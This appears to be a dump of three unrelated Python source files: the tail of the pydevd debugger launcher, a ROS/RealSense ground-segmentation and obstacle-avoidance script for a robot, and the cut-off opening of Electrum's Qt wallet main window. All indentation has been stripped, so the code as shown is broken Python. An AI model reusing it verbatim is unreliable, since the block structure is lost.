pydev_log.debug("Executing file %s", setup['file'])
pydev_log.debug("arguments: %s", (sys.argv,))
pydevd_vm_type.setup_type(setup.get('vm_type', None))
if SHOW_DEBUG_INFO_ENV:
set_debug(setup)
DebugInfoHolder.DEBUG_RECORD_SOCKET_READS = setup.get('DEBUG_RECORD_SOCKET_READS', DebugInfoHolder.DEBUG_RECORD_SOCKET_READS)
DebugInfoHolder.DEBUG_TRACE_BREAKPOINTS = setup.get('DEBUG_TRACE_BREAKPOINTS', DebugInfoHolder.DEBUG_TRACE_BREAKPOINTS)
DebugInfoHolder.DEBUG_TRACE_LEVEL = setup.get('DEBUG_TRACE_LEVEL', DebugInfoHolder.DEBUG_TRACE_LEVEL)
port = setup['port']
host = setup['client']
f = setup['file']
fix_app_engine_debug = False
debugger = get_global_debugger()
if debugger is None:
debugger = PyDB()
try:
from _pydev_bundle import pydev_monkey
except:
pass # Not usable on jython 2.1
else:
if setup['multiprocess']: # PyDev
pydev_monkey.patch_new_process_functions()
elif setup['multiproc']: # PyCharm
pydev_log.debug("Started in multiproc mode\n")
global DISPATCH_APPROACH
DISPATCH_APPROACH = DISPATCH_APPROACH_EXISTING_CONNECTION
dispatcher = Dispatcher()
try:
dispatcher.connect(host, port)
if dispatcher.port is not None:
port = dispatcher.port
pydev_log.debug("Received port %d\n", port)
pydev_log.info("pydev debugger: process %d is connecting\n" % os.getpid())
try:
pydev_monkey.patch_new_process_functions()
except:
pydev_log.exception("Error patching process functions.")
else:
pydev_log.critical("pydev debugger: couldn't get port for new debug process.")
finally:
dispatcher.close()
else:
try:
pydev_monkey.patch_new_process_functions_with_warning()
except:
pydev_log.exception("Error patching process functions.")
# Only do this patching if we're not running with multiprocess turned on.
if f.find('dev_appserver.py') != -1:
if os.path.basename(f).startswith('dev_appserver.py'):
appserver_dir = os.path.dirname(f)
version_file = os.path.join(appserver_dir, 'VERSION')
if os.path.exists(version_file):
try:
stream = open(version_file, 'r')
try:
for line in stream.read().splitlines():
line = line.strip()
if line.startswith('release:'):
line = line[8:].strip()
version = line.replace('"', '')
version = version.split('.')
if int(version[0]) > 1:
fix_app_engine_debug = True
elif int(version[0]) == 1:
if int(version[1]) >= 7:
# Only fix from 1.7 onwards
fix_app_engine_debug = True
break
finally:
stream.close()
except:
pydev_log.exception()
try:
# In the default run (i.e.: run directly on debug mode), we try to patch stackless as soon as possible
# on a run where we have a remote debug, we may have to be more careful because patching stackless means
# that if the user already had a stackless.set_schedule_callback installed, he'd lose it and would need
# to call it again (because stackless provides no way of getting the last function which was registered
# in set_schedule_callback).
#
# So, ideally, if there's an application using stackless and the application wants to use the remote debugger
# and benefit from stackless debugging, the application itself must call:
#
# import pydevd_stackless
# pydevd_stackless.patch_stackless()
#
# itself to be able to benefit from seeing the tasklets created before the remote debugger is attached.
from _pydevd_bundle import pydevd_stackless
pydevd_stackless.patch_stackless()
except:
# It's ok not having stackless there...
try:
if hasattr(sys, 'exc_clear'):
sys.exc_clear() # the exception information should be cleaned in Python 2
except:
pass
is_module = setup['module']
if not setup['skip-notify-stdin']:
patch_stdin()
if setup[pydevd_constants.ARGUMENT_JSON_PROTOCOL]:
PyDevdAPI().set_protocol(debugger, 0, JSON_PROTOCOL)
elif setup[pydevd_constants.ARGUMENT_HTTP_JSON_PROTOCOL]:
PyDevdAPI().set_protocol(debugger, 0, HTTP_JSON_PROTOCOL)
elif setup[pydevd_constants.ARGUMENT_HTTP_PROTOCOL]:
PyDevdAPI().set_protocol(debugger, 0, pydevd_constants.HTTP_PROTOCOL)
elif setup[pydevd_constants.ARGUMENT_QUOTED_LINE_PROTOCOL]:
PyDevdAPI().set_protocol(debugger, 0, pydevd_constants.QUOTED_LINE_PROTOCOL)
access_token = setup['access-token']
if access_token:
debugger.authentication.access_token = access_token
client_access_token = setup['client-access-token']
if client_access_token:
debugger.authentication.client_access_token = client_access_token
if fix_app_engine_debug:
sys.stderr.write("pydev debugger: google app engine integration enabled\n")
curr_dir = os.path.dirname(__file__)
app_engine_startup_file = os.path.join(curr_dir, 'pydev_app_engine_debug_startup.py')
sys.argv.insert(1, '--python_startup_script=' + app_engine_startup_file)
import json
setup['pydevd'] = __file__
sys.argv.insert(2, '--python_startup_args=%s' % json.dumps(setup),)
sys.argv.insert(3, '--automatic_restart=no')
sys.argv.insert(4, '--max_module_instances=1')
# Run the dev_appserver
debugger.run(setup['file'], None, None, is_module, set_trace=False)
else:
if setup['save-threading']:
debugger.thread_analyser = ThreadingLogger()
if setup['save-asyncio']:
if IS_PY34_OR_GREATER:
debugger.asyncio_analyser = AsyncioLogger()
apply_debugger_options(setup)
try:
debugger.connect(host, port)
except:
sys.stderr.write("Could not connect to %s: %s\n" % (host, port))
pydev_log.exception()
sys.exit(1)
globals = debugger.run(setup['file'], None, None, is_module)
if setup['cmd-line']:
debugger.wait_for_commands(globals)
if __name__ == '__main__':
main()
|
ground_seg.py
|
######################################
#######realsense plotting#############
######################################
'''
Working with
UBUNTU 16.04 LTS
OPENCV 4.0~
Python 3.6
pyrealsense2
matplotlib
numpy
for intel D435i
font
'''
import numpy as np
import cv2
import matplotlib.pyplot as plt
import math
import time
import sys
from sensor_msgs.msg import Image, CompressedImage
from geometry_msgs.msg import Twist
from nav_msgs.msg import Odometry
import rospy
import easyGo
from std_msgs.msg import String
from cv_bridge import CvBridge, CvBridgeError
import threading
from time import sleep
import csv
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--control', action='store_true')
parser.add_argument('--plot', action='store_true')
parser.add_argument('--csv', action='store_true')
args = parser.parse_args()
global depth_scale, ROW, COL
if args.csv:
CSV_NAME = "office_01"
f= open(CSV_NAME+'.csv','w')
wr = csv.writer(f)
wr.writerow(["time", \
"linear_x", "angular_z", \
"deadends"])
#size of images
COL= 480
ROW = 640
#ROBOT MOVE
SPEED = 15
ROTATE_SPEED = 25
ANGULAR_SPEED = 0.2
# Set goal position
GOAL_X = 0
GOAL_Y = 5
VERTICAL_CORRECTION = 0.35 # 0.15 #0.45 # correction parameter for flattening the parabolic (lens-distorted) depth profile to linear
WARP_PARAM = 0.45 # value should be 0.0 ~ 1.0. Bigger values give a stronger warp. 0.45
GRN_ROI = 200 # the COL (vertical) index from which the image is treated as the ground ROI. 400 300
ZOOM_PARAM = 0.15 # force-calibrate the depth image to match the color image. 0.15 0.205
UNAVAILABLE_THRES = 200 # the COL index used as the threshold for marking a virtual lane unavailable. default 170
ROBOT_WIDTH_LIST = [2,3,4,5]
ROBOT_LEFT = 1
ROBOT_RIGHT = 6
font = cv2.FONT_HERSHEY_SCRIPT_SIMPLEX
fontScale = 1.5
yellow = (0, 255, 255)
depth_image_raw = 0
color_image_raw = 0
robot_state = 0
cmd_vel = 0
t = time.time()
def euler_from_quaternion(x,y,z,w):
t3 = 2.0*(w*z+x*y)
t4 = 1.0-2.0*(y*y+z*z)
yaw_z = math.atan2(t3,t4)
return yaw_z
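# Worked example (sanity check, not part of the original script): a quaternion for a
# pure 90-degree yaw has x=0, y=0, z=sin(pi/4)~=0.7071, w=cos(pi/4)~=0.7071, so
#     t3 = 2.0*(0.7071*0.7071 + 0.0) ~= 1.0
#     t4 = 1.0 - 2.0*(0.0 + 0.7071**2) ~= 0.0
#     yaw_z = atan2(1.0, 0.0) = pi/2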
# Topview image. src and dst are numpy arrays.
def Topview(src):
global WARP_PARAM, ROW, COL
# col=720, row=1280
col, row = src.shape[0], src.shape[1]
corners = np.float32([[row*WARP_PARAM/2, 0], [row*(1-WARP_PARAM/2), 0], [0, col], [row, col]])
warp_corners = np.float32([[0, 0], [ROW, 0], [0, COL], [ROW, COL]])
trans_matrix = cv2.getPerspectiveTransform(corners, warp_corners)
dst = cv2.warpPerspective(src, trans_matrix, (ROW, COL))
return dst
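# Illustrative usage sketch (dummy image; shapes follow the COL/ROW globals above):
#
#     dummy = np.zeros((COL, ROW, 3), dtype=np.uint8)
#     top = Topview(dummy)   # warped to dsize=(ROW, COL), i.e. top.shape == (COL, ROW, 3)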
#vertically scan ground
def verticalGround(depth_image2, images, numCol, plot):
global depth_scale, GRN_ROI, ROW, COL
###################################################################################
#############Calibration. CHECK HERE WHEN YOU USE DIFFERENT CAMERA!!###############
###################################################################################
numLine=numCol
#Force correction. Depth and color pixels don't match.
numCol=(int)((numCol-150)*(-0.15)+numCol)
# get [i,640] column
_640col = [a[numCol] for a in depth_image2]
abs_x = []
abs_y = []
ground_center_idx = []
# depth_image2[360] = depth_image2[360] * float(depth_scale)
for idx, temp in enumerate(_640col):
if _640col[idx] == 0:
abs_x.append(None)
abs_y.append(None)
else:
# true_idx is the calibrated index, because the start point is not zero: the ROI starts at GRN_ROI.
true_idx = GRN_ROI + idx*(COL-GRN_ROI)/float(COL)
# Correction from parabola to linear; in other words, correcting lens distortion with a 2nd-order function.
_640col[idx] = temp * depth_scale * (abs(true_idx -COL/2)**2/float(360**2)*VERTICAL_CORRECTION + 1)
# 58.0 is the vertical FOV of the depth IR sensor. abs_x and abs_y are the absolute coordinates of one column of the depth image.
abs_x.append(
_640col[idx] * math.cos(
((float)(58.0 / 2.0 - 58.0 * (float)(true_idx) / COL)) * 3.14 / 180.0))
abs_y.append(
_640col[idx] * math.sin((float)(58.0 / 2.0 - 58.0 * (float)(true_idx) / COL) * 3.14 / 180.0))
idx = 20 # temporarily set the starting point that we assume is almost certainly ground.
try:
while abs_x[COL - idx] == None:
idx += 1
ground_center_idx.append(COL - idx) #ground_center_idx contains all the indexes of ground.
except:
print("TOO CLOSE!!!!!!!!!!!!!")
ground_center_idx.append(COL - 30)
i = 0
groundCount = 0 # count of points considered ground
hurdleCount = 0 # count of consecutive points not considered ground; reset to zero whenever ground is found again.
while idx < COL:
#try:
if abs_x[COL - idx] == None or abs_y[COL - idx] == None:
idx += 1
#print(idx)
continue
# (abs(abs_x[ground_center_idx[i]] - abs_x[(720 - idx)]) < 0.4) and (
# To find ground indexes we use the gradient: if the variation dy/dx is lower than a threshold, append the point.
####################################################################################################
#######19/04/26 : I have updated the way of checking gradient. Now I use two gradients##############
#######from original, and from the current ground pixel. It works better ###########################
####################################################################################################
gradient_from_original = (abs_y[(COL - idx)] - abs_y[ground_center_idx[0]]) / float(abs_x[(COL - idx)] - abs_x[ground_center_idx[0]])
gradient_from_current = (abs_y[(COL - idx)] - abs_y[ground_center_idx[i]]) / float(abs_x[(COL - idx)] - abs_x[ground_center_idx[i]])
#print("dist" + str(_640col[COL - idx]))
if abs(gradient_from_original + 0.13) < 0.2 and abs(gradient_from_current + 0.133) < 0.15: # These numbers are carefully selected
#print("origin: ", gradient_from_original, "current: ", gradient_from_current)
ground_center_idx.append((COL - idx))
i += 1
cv2.circle(images, (numLine, (COL - idx)), 7, (0, 255, 0), 2)
groundCount += 1
hurdleCount = 0
# print(idx)
idx += 20
elif hurdleCount > 1:
break
else:
hurdleCount += 1
idx += 20
if plot:
#print(abs_x[ground_center_idx[0]], abs_y[ground_center_idx[0]])
#print(abs_x[ground_center_idx[-1]], abs_y[ground_center_idx[-1]])
#print((abs_x[ground_center_idx[-1]]-abs_x[ground_center_idx[0]])/(abs_y[ground_center_idx[-1]]-abs_y[ground_center_idx[0]]))
try:
# print(ground_center_idx[0])
plt.plot(abs_x, abs_y)
plt.scatter(abs_x[ground_center_idx[0]], abs_y[ground_center_idx[0]], color='r',
s=20) # red point on start point of ground
plt.scatter(abs_x[ground_center_idx[-1]], abs_y[ground_center_idx[-1]], color='r', s=20)
plt.xlim(0, 4) #5
plt.ylim(-2, 2)
plt.pause(0.05)
plt.cla()
plt.clf()
except:
pass
if ground_center_idx[-1] > UNAVAILABLE_THRES:
#dead_end = COL
dead_end = ground_center_idx[-1]
cv2.line(images, (numLine, 0), (numLine, ROW), (0, 0, 255), 5) # Draw a red line when the detected ground does not reach as far as we want.
else:
dead_end = ground_center_idx[-1]
cv2.line(images, (numLine, ground_center_idx[-1]), (numLine, COL), (0, 255, 0), 5) #Draw a green line.
try:
#pass
# Apply colormap on depth image (image must be converted to 8-bit per pixel first)
cv2.circle(images, (numLine, ground_center_idx[0]), 5, (255, 255, 255), 10)
cv2.putText(images, str(round(abs_x[ground_center_idx[0]],2)) + "m", (numLine, COL - 100), font, fontScale, yellow, 2)
except:
pass
return images, dead_end
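# Note on the return value (a sketch of the intent, based on the checks above): dead_end is
# the COL (row) index of the farthest ground point found along this column; a larger value
# (lower in the image) means the traversable ground ends closer to the robot, and values
# above UNAVAILABLE_THRES mark the corresponding virtual lane as blocked.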
def preGroundSeg(depth_image, color_image):
global ROW, COL, GRN_ROI
# FIXME: don't do ZOOM_PARAM in GAZEBO
# Force-calibrate the depth image to match the color image. Interpolation is really important. DO NOT USE INTER_LINEAR. IT MAKES NOISE!!!!
#depth_image = cv2.resize(depth_image[(int)(COL * ZOOM_PARAM):(int)(COL * (1 - ZOOM_PARAM)), (int)(ROW * ZOOM_PARAM):(int)(ROW * (1 - ZOOM_PARAM))],
# dsize=(ROW, COL), interpolation=cv2.INTER_NEAREST)
# ROI image
depth_image = depth_image[GRN_ROI:COL, 0:ROW]
color_image = color_image[GRN_ROI:COL, 0:ROW]
# Topview image
depth_image2 = Topview(depth_image)
color_image2 = Topview(color_image)
return depth_image2, color_image2
def GroundSeg(depth_image, color_image, stride=80):
global ROW
virtual_lane_available = []
for i in range(stride, ROW, stride):
if args.plot and i == ROW/2:
temp_image, dead_end = verticalGround(depth_image, color_image, i, plot=True)
else:
temp_image, dead_end = verticalGround(depth_image, color_image, i, plot=False)
virtual_lane_available.append(dead_end)
return temp_image, virtual_lane_available
def bool_straight(virtual_lane_available, unavailable_thres):
global ROBOT_WIDTH_LIST
for i in ROBOT_WIDTH_LIST:
# > means unavailable path
if virtual_lane_available[i] > unavailable_thres:
return False
return True
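# Worked example (hypothetical values, threshold 200): with ROBOT_WIDTH_LIST = [2, 3, 4, 5],
#     bool_straight([100, 100, 150, 150, 150, 150, 100], 200) -> True  (all robot-width lanes clear)
#     bool_straight([100, 100, 150, 250, 150, 150, 100], 200) -> False (lane index 3 is blocked)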
def LaneHandling(virtual_lane_available, unavailable_thres, n):
center = int(len(virtual_lane_available)/2)
#If center lane is blocked.
if virtual_lane_available[center] > unavailable_thres:
#two lanes are both unavailable
if n > center:
print("GO BACK")
return 4
if virtual_lane_available[center-n] > unavailable_thres and virtual_lane_available[center+n] > unavailable_thres:
n+=1
if n > center:
print("GO BACK")
return 4
else:
return LaneHandling(virtual_lane_available, unavailable_thres, n)
elif virtual_lane_available[center-n] > unavailable_thres:
print("TURN RIGHT")
return 3
elif virtual_lane_available[center+n] > unavailable_thres:
print("TURN LEFT")
return 2
else:
n += 1
return LaneHandling(virtual_lane_available, unavailable_thres, n)
# Check where a future obstacle is and avoid it.
else:
if n > center:
print("NO OBS")
return 0 # no obstacle
if virtual_lane_available[center-n] > unavailable_thres and virtual_lane_available[center+n] > unavailable_thres and n > 2:
print("GO STRAIGHT")
return 1 # robot can pass through
if virtual_lane_available[center-n] > unavailable_thres:
print("TURN RIGHT")
return 3
elif virtual_lane_available[center+n] > unavailable_thres:
print("TURN LEFT")
return 2
else:
n+=1
return LaneHandling(virtual_lane_available, unavailable_thres, n)
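# Worked example (hypothetical dead-end values; with 7 virtual lanes center == 3, threshold 200):
#
#     LaneHandling([100, 100, 250, 250, 100, 100, 100], 200, 1) -> 3 (turn right:
#         the center lane and the lane at center-1 are blocked)
#     LaneHandling([250, 100, 100, 100, 100, 100, 250], 200, 1) -> 1 (go straight:
#         the center is free and only the outermost lanes are blocked, found at n == 3)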
def GoEasy(direc):
if direc == 4: # Backward
easyGo.mvStraight(- SPEED, -1)
elif direc == 1: # Go straight
easyGo.mvStraight(SPEED, -1)
elif direc == 2: # turn left
easyGo.mvRotate(ROTATE_SPEED, -1, False)
elif direc == 3: # turn right
easyGo.mvRotate(ROTATE_SPEED, -1, True)
def depth_callback(data):
global depth_image_raw
depth_image_raw = bridge.imgmsg_to_cv2(data, "32FC1")
def image_callback(data):
global color_image_raw
color_image_raw = bridge.compressed_imgmsg_to_cv2(data, "bgr8")
def state_callback(data):
global robot_state
q = data.pose.pose.orientation
yaw = euler_from_quaternion(q.x, q.y, q.z, q.w)
robot_state = [-data.pose.pose.position.y, data.pose.pose.position.x, -yaw]
def cmd_callback(data):
global cmd_vel
cmd_vel = data
def listener():
#rospy.init_node('node_name')
bridge = CvBridge()
rospy.Subscriber("/camera/depth/image_raw", Image, depth_callback)
rospy.Subscriber("/camera/color/image_raw/compressed", CompressedImage, image_callback)
rospy.Subscriber("/odom", Odometry, state_callback)
if args.csv:
rospy.Subscriber("/cmd_vel", Twist, cmd_callback)
# spin() simply keeps python from exiting until this node is stopped
rospy.spin()
def main():
# Configure depth and color streams
global depth_scale, ROW, COL, GRN_ROI, bridge
fpsFlag = False
numFrame = 1
fps = 0.0
bridge = CvBridge()
realsense_listener = threading.Thread(target=listener)
realsense_listener.start()
depth_scale = 1.0
startTime = time.time()
ground_seg_time = 0.0
lpp_time = 0.0
dist = 10.0
while(dist > 0.8):
t1 = time.time()
global depth_image_raw, color_image_raw, robot_state
if type(depth_image_raw) == type(0) or type(color_image_raw) == type(0):
sleep(0.1)
continue
dist = math.sqrt((GOAL_X - robot_state[1])**2 + (-GOAL_Y - robot_state[0])**2)
depth_image, color_image = preGroundSeg(depth_image_raw, color_image_raw)
# last step
color_image, virtual_lane_available = GroundSeg(depth_image, color_image)
t2 = time.time()
# handling lane
cv2.line(color_image, (0, UNAVAILABLE_THRES), (ROW, UNAVAILABLE_THRES), (0, 255, 0), 2)
if args.csv:
virtual_lane_available = np.array(virtual_lane_available)
# virtual_lane_available = UNAVAILABLE_THRES - virtual_lane_available # normalize. 0 means top of the image
virtual_lane_available = COL - virtual_lane_available
temp = [(time.time()-t), cmd_vel.linear.x, cmd_vel.angular.z]
temp.extend([x for x in virtual_lane_available])
wr.writerow(temp)
t3 = time.time()
direc = LaneHandling(virtual_lane_available, UNAVAILABLE_THRES, 1)
if args.control:
if direc == 0:
diff_angle = (-robot_state[2] + math.atan2(GOAL_X - robot_state[1], -GOAL_Y - robot_state[0]))
if diff_angle > 0:
v_ang = ANGULAR_SPEED * min(diff_angle/(math.pi/2), 1)
else:
v_ang = ANGULAR_SPEED * max(diff_angle/(math.pi/2), -1)
easyGo.mvCurve(SPEED, -v_ang)
else:
GoEasy(direc) # FIXME
t4 = time.time()
ground_seg_time += t2-t1
lpp_time += t4-t3
print("ground_seg took: {} sec".format(t2-t1))
print("MORP took: {} sec".format(t4-t3))
print("Average took: {} sec, {} sec, numFrame {}".format(ground_seg_time/numFrame, lpp_time/numFrame, numFrame))
print("Distance to the Goal: {}".format(dist))
cv2.namedWindow('RealSense', cv2.WINDOW_AUTOSIZE)
cv2.imshow('RealSense', color_image)
#cv2.imshow('RealSense_depth', depth_image)
if cv2.waitKey(1) == 27: #esc
easyGo.stop()
cv2.destroyAllWindows()
rospy.signal_shutdown("esc")
if args.csv:
f.close()
sys.exit(1)
break
# FPS
numFrame += 1
easyGo.stop()
rospy.signal_shutdown("esc")
if __name__ == "__main__":
rospy.init_node('robot_mvs', anonymous=False)
main()
if args.csv:
f.close()
exit()
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional, TYPE_CHECKING, Sequence, List, Union
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor, QFont
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtCore import QTimer
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QSizePolicy, QStatusBar, QToolTip, QDialog,
QMenu, QAction, QStackedWidget, QToolButton)
import electrum
from electrum import (keystore, ecc, constants, util, bitcoin, commands,
paymentrequest, lnutil)
from electrum.bitcoin import COIN, is_address
from electrum.plugin import run_hook, BasePlugin
from electrum.i18n import _
from electrum.util import (format_time, get_backup_dir,
UserCancelled, profiler,
bh2u, bfh, InvalidPassword,
UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI, maybe_extract_bolt11_invoice, NotEnoughFunds,
NoDynamicFeeEstimates, MultipleSpendMaxTxOutputs,
AddTransactionException, BITCOIN_BIP21_URI_SCHEME)
from electrum.invoices import PR_TYPE_ONCHAIN, PR_TYPE_LN, PR_DEFAULT_EXPIRATION_WHEN_CREATING, Invoice
from electrum.invoices import PR_PAID, PR_FAILED, pr_expiration_values, LNInvoice, OnchainInvoice
from electrum.transaction import (Transaction, PartialTxInput,
PartialTransaction, PartialTxOutput)
from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption,
CannotDoubleSpendTx, CannotCPFP)
from electrum.version import ELECTRUM_VERSION
from electrum.network import (Network, TxBroadcastError, BestEffortRequestFailed,
UntrustedServerReturnedError, NetworkException)
from electrum.exchange_rate import FxThread
from electrum.simple_config import SimpleConfig
from electrum.logging import Logger
from electrum.lnutil import ln_dummy_address, extract_nodeid, ConnStringFormatError
from electrum.lnaddr import lndecode, LnDecodeException
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, FreezableLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider, FeeComboBox
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton,
import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen,
TRANSACTION_FILE_EXTENSION_FILTER_ANY, MONOSPACE_FONT,
getOpenFileName, getSaveFileName, BlockingWaitingDialog)
from .util import ButtonsTextEdit, ButtonsLineEdit
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
from .channels_list import ChannelsList
from .confirm_tx_dialog import ConfirmTxDialog
from .transaction_dialog import PreviewTxDialog
from .rbf_dialog import BumpFeeDialog, DSCancelDialog
if TYPE_CHECKING:
from . import ElectrumGui
LN_NUM_PAYMENT_ATTEMPTS = 10
class StatusBarButton(QToolButton):
# note: this class has a custom stylesheet applied in stylesheet_patcher.py
def __init__(self, icon, tooltip, func):
QToolButton.__init__(self)
self.setText('')
self.setIcon(icon)
self.setToolTip(tooltip)
self.setToolButtonStyle(Qt.ToolButtonTextBesideIcon)
self.setAutoRaise(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() in [Qt.Key_Return, Qt.Key_Enter]:
self.func()
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
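# Illustrative use of @protected (the method name below is hypothetical): a wrapped
# method simply declares a trailing 'password' argument that the decorator fills in, e.g.
#
#     @protected
#     def do_sign(self, message, address, password):
#         ...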
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
#ln_payment_attempt_signal = pyqtSignal(str)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
show_error_signal = pyqtSignal(str)
payment_request: Optional[paymentrequest.PaymentRequest]
def __init__(self, gui_object: 'ElectrumGui', wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
assert wallet, "no wallet"
self.wallet = wallet
if wallet.has_lightning():
self.wallet.config.set_key('show_channels_tab', True)
self.setup_exception_hook()
self.network = gui_object.daemon.network # type: Network
self.fx = gui_object.daemon.fx # type: FxThread
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.payment_request = None # type: Optional[paymentrequest.PaymentRequest]
self.payto_URI = None
self.checking_accounts = False
self.qr_window = None
self.pluginsdialog = None
self.showing_cert_mismatch_error = False
self.tl_windows = []
self.pending_invoice = None
Logger.__init__(self)
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.completions = QStringListModel()
coincontrol_sb = self.create_coincontrol_statusbar()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
self.channels_tab = self.create_channels_tab()
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.channels_tab, read_QIcon("lightning.png"), _("Channels"), "channels")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
central_widget = QWidget()
vbox = QVBoxLayout(central_widget)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.addWidget(tabs)
vbox.addWidget(coincontrol_sb)
self.setCentralWidget(central_widget)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.show_error_signal.connect(self.show_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram', 'on_quotes',
'on_history', 'channel', 'channels_updated',
'payment_failed', 'payment_succeeded',
'invoice_status', 'request_status', 'ln_gossip_sync_progress',
'cert_mismatch', 'gossip_db_loaded']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
util.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
# update fee slider in case we missed the callback
#self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
# If the option hasn't been set yet
if config.get('check_updates') is None:
